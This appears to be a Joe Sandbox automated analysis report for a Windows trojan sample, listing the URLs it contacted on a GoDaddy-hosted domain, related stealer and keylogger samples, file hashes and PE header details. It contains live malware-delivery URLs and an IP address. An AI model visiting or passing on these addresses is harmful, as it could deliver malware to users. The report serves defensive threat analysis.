            https://amazonenviro.com/245_Nsltarpncon(zp0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon/0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconW~0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpnconlg0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpnconerse0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconH0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconF0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon?0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon30%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            amazonenviro.com
            		166.62.27.188
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://amazonenviro.com/245_Nsltarpncontrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://amazonenviro.com/245_NsltarpnconVLbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006C7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconWLbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006C1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconLLbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006C7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com:443/245_NsltarpnconZZZZ:sLbZ88q4uPa.exe, 00000000.00000002.2937308128.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconPLbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1949462184.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconbLbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006F3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconcLbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006C7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_Nsltarpncon.64.1.1LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconiLbZ88q4uPa.exe, 00000000.00000002.2937308128.000000000063E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com:443/245_NsltarpnconcloseLbZ88q4uPa.exe, 00000000.00000003.1949462184.0000000000705000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com:443/245_NsltarpnconLbZ88q4uPa.exe, 00000000.00000002.2937308128.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359840806.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2188951037.0000000021382000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2489960662.000000000070A000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2686960798.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2260288403.0000000021382000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1949462184.0000000000705000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/wLbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/hLbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/oLbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_Nsltarpncon8i8LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconyLbZ88q4uPa.exe, 00000000.00000003.1949462184.00000000006F3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com:443/245_Nsltarpnconiro.comhtepLbZ88q4uPa.exe, 00000000.00000002.2937308128.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com:443/245_NsltarpnconjLbZ88q4uPa.exe, 00000000.00000003.2359840806.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/gLbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_NsltarpnconqLbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006C7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/XLbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/_LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com:443/245_Nsltarpncon5zmLbZ88q4uPa.exe, 00000000.00000003.2489960662.000000000070A000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/WLbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://amazonenviro.com/JLbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://amazonenviro.com/OLbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://amazonenviro.com/GLbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://amazonenviro.com/245_NsltarpnconM~.LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1787030219.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpnconc)LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_Nsltarpncon_LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/8LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/?LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpncon)LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/7LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/(LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpncon5LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com//LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpncon/LbZ88q4uPa.exe, 00000000.00000003.2045905291.0000000021360000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpncon0LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_NsltarpnconW~LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1787030219.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpncon(zpLbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1787030219.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_NsltarpnconerseLbZ88q4uPa.exe, 00000000.00000003.1949462184.0000000000705000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_NsltarpnconFLbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_NsltarpnconHLbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006F6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_NsltarpnconlgLbZ88q4uPa.exe, 00000000.00000003.2188951037.0000000021382000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2260288403.0000000021382000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpncon?LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_Nsltarpncon3LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2686960798.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    166.62.27.188
                    		amazonenviro.comUnited States
                    		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                    General Information

                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1590516
                    Start date and time:2025-01-14 08:22:07 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 59s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:LbZ88q4uPa.exe
                    renamed because original name is a hash value
                    Original Sample Name:bf9b75adf866583299dbc8a5fad66cfc.exe
                    Detection:MAL
                    Classification:mal76.troj.evad.winEXE@1/0@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 23
                    • Number of non-executed functions: 39
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    02:22:57API Interceptor77x Sleep call for process: LbZ88q4uPa.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    166.62.27.188zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg
                    ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg
                    yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg
                    ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    amazonenviro.comPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
                    • 166.62.27.188
                    ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    AS-26496-GO-DADDY-COM-LLCUSPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    trow.exeGet hashmaliciousUnknownBrowse
                    • 107.180.98.101
                    https://upholl-xlognusa.godaddysites.com/Get hashmaliciousUnknownBrowse
                    • 198.71.248.123
                    3.elfGet hashmaliciousUnknownBrowse
                    • 184.168.52.170
                    http://logiinnmaskemettaha93.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                    • 198.71.248.123
                    http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                    • 198.71.248.123
                    http://metamssk-luggiinn.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                    • 198.71.248.123
                    http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                    • 72.167.84.16
                    n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.28.135
                    C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.28.135

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    a0e9f5d64349fb13191bc781f81f42e1PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                    • 166.62.27.188
                    uo9m.exeGet hashmaliciousLummaCBrowse
                    • 166.62.27.188
                    uo9m.exeGet hashmaliciousLummaCBrowse
                    • 166.62.27.188
                    YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                    • 166.62.27.188
                    msit.exeGet hashmaliciousLummaC StealerBrowse
                    • 166.62.27.188
                    tesr.exeGet hashmaliciousLummaC StealerBrowse
                    • 166.62.27.188
                    WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                    • 166.62.27.188

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.248914742573976
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.38%
                    • InstallShield setup (43055/19) 0.43%
                    • Windows Screen Saver (13104/52) 0.13%
                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    File name:LbZ88q4uPa.exe
                    File size:1'161'216 bytes
                    MD5:bf9b75adf866583299dbc8a5fad66cfc
                    SHA1:377f83f54d1226a181f265557804001cb9deee6a
                    SHA256:1bec44aa19ea8daa0b7151b312975f3f753e03f0bbce5ebeab8dfda5fb736a91
                    SHA512:384b92d7ecbd8c5242815cb8ec6bce0096412d2f558c61c4c91a5aff38d3da8cf297d40362b91c1f4620d02700954fbee71519e4735ee4bd17413ee491220fd7
                    SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                    TLSH:C135AE3790B387FEC15385798D5F9BE4B82EA9303A28B952FED57D0C4B242427938197
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                    File Icon

                    Icon Hash:4f858a8c8e8e8946

                    Static PE Info

                    General

                    Entrypoint:0x46e80c
                    Entrypoint Section:.itext
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:44c8864bd68c3bff94639c69671ea4b7

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFF0h
                    mov eax, 0046D250h
                    call 00007F15E8D8A281h
                    mov ecx, dword ptr [00470E9Ch]
                    mov eax, dword ptr [00470D8Ch]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [0046CB00h]
                    call 00007F15E8DE0119h
                    mov eax, dword ptr [00470D8Ch]
                    mov eax, dword ptr [eax]
                    call 00007F15E8DE018Dh
                    call 00007F15E8D880E0h
                    lea eax, dword ptr [eax+00h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x750000x266e.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000xa1c00.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x7ce8.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x790000x18.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x757540x600.idata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
